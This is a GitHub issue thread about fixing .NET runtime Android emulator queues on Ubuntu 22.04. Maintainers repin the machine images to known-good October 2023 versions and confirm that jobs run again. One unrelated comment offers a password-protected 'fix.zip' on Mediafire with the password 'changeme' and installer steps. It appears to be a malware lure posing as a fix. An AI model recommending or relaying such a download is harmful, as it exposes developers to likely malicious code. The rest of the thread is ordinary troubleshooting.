### ISSUE TITLE
Fix ubuntu 2204 android rt emulator queues

### ISSUE THREAD

**Issue by riarenas** [dotnet/dnceng#3888]
Need to hardcode the ubuntu 2204 android emulator queues in the runtime subscriptions to use the latest known good image from 2023. 

### Release Note Category
- [ ] Feature changes/additions 
- [ ] Bug fixes
- [ ] Internal Infrastructure Improvements
### Release Note Description

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by riarenas** [comment]
All of the .rt android scale sets from versions 21-28 were still using images from 7/15 that we know for a fact don't work. All of these scale sets had between 60 and 300 machines due to the continued failures to provision heartbeating machines. 

I've updated these scale sets to use the last known good versions from October 2023 and I'm currently monitoring manually for recovery as these queues are not showing up in Grafana due to https://github.com/dotnet/dnceng/issues/3481

**Comment by riarenas** [comment]
I see machines successfully provisioning and heartbeating for all these queues. Waiting for confirmation that jobs sent to them are successful.

**Comment by matouskozak** [comment]
> I see machines successfully provisioning and heartbeating for all these queues. Waiting for confirmation that jobs sent to them are successful.

I can see the jobs finishing in https://dev.azure.com/dnceng-public/public/_build/results?buildId=788159&view=logs&j=2710b830-bfa8-5592-b8bc-89224650110b. Thank you for the quick fix.
